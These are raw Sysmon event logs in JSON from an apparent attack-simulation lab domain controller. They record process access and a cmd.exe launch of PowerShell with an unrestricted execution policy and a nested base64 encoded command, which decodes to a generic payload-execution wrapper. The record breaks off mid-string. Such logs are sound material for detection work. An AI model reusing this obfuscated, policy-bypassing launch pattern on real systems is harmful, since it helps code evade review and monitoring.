{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8355,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.669\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.669","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8356,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.684\r\nSourceProcessGUID: {A837DB8D-0527-5F25-0000-0010C9C41300}\r\nSourceProcessId: 752\r\nSourceThreadId: 4348\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.684","SourceProcessGUID":"{A837DB8D-0527-5F25-0000-0010C9C41300}","SourceProcessId":"752","SourceThreadId":"4348","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0527-5F25-0000-00100DC71300}","TargetProcessId":"3356","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:01:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:01:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8357,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:01:11.688\r\nProcessGuid: {A837DB8D-0527-5F25-0000-0010D1C71300}\r\nProcessId: 4892\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0527-5F25-0000-002012C41300}\r\nLogonId: 0x13C412\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-0527-5F25-0000-00100DC71300}\r\nParentProcessId: 3356\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:01:11.688","ProcessGuid":"{A837DB8D-0527-5F25-0000-0010D1C71300}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0527-5F25-0000-002012C41300}","LogonId":"0x13c412","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-0527-5F25-0000-00100DC71300}","ParentProcessId":"3356","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBA